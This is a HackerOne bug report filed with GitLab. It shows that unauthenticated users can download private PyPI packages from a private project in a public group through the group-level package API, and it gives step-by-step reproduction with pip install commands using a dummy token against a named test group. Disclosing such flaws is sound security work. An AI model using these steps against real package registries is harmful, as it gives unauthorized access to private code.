Unauthenticated users can access private PyPI packages that belong to a public group using /api/v4/groups/{id}/-/packages/pypi/simple
HackerOne report #2035173 by js_noob
on 2023-06-22, assigned to @ottilia_westerlund:
Report | Attachments | How To Reproduce
Report
Summary
Hello team, as known when a package registry belongs to a private group it and Package registry
is turned off in the project settings, this should block EVERY SINGLE user from accessing this project's package registries. However, if this project belonged to a public group, ANY UNAUTHENTICATED user can access and download those packages.
Steps to reproduce
As an owner:
- Create a new public group
- Create a private project in that group, with the content in the following zip file
- After the project creation change the content of
pyproject.toml
and add your name and email
- Verify that a pipeline is triggered
- Wait a couple of minutes, then navigate to https://gitlab.com/GROUP/PROJECT/-/packages, and verify that a new package is created -- Now you can directly jump to step 9, or if you wanted to add another layer of security you can continue in order. But at this point, no external users should be able to access this package
- Navigate to the project settings https://gitlab.com/GROUP/PROJECT/edit and disable
Package registry
- Let's try to fetch the package as the owner, on your PC terminal run (you can create PAT here https://gitlab.com/-/profile/personal_access_tokens)
pip install mypypipackage --index-url https://__token__:OWNER_ACCESS_TOKEN@gitlab.com/api/v4/projects/PROJECT_ID/packages/pypi/simple
- Verify that the owner can't access it. Ideally, if the owner can't no one should be able to, right?
As an unauthenticated user:
- Navigate to https://gitlab.com/groups/GROUP/-/packages and verify that there are no packages you have access to
- Run the following command in your terminal
pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/GROUP_ID/-/packages/pypi/simple
- Verify that you can access that private package without using an access token, i.e. without being logged in
As a double check:
You can check my private packages at https://gitlab.com/groups/my-nice-group-new-version/-/packages, verify that you can't see any packages.
Run the following command and verify that you can download my private package
pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/68082643/-/packages/pypi/simple
Video/POC
bandicam_2023-06-22_20-40-23-327.mp4
Impact
Unauthenticated users can access private PyPI packages.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: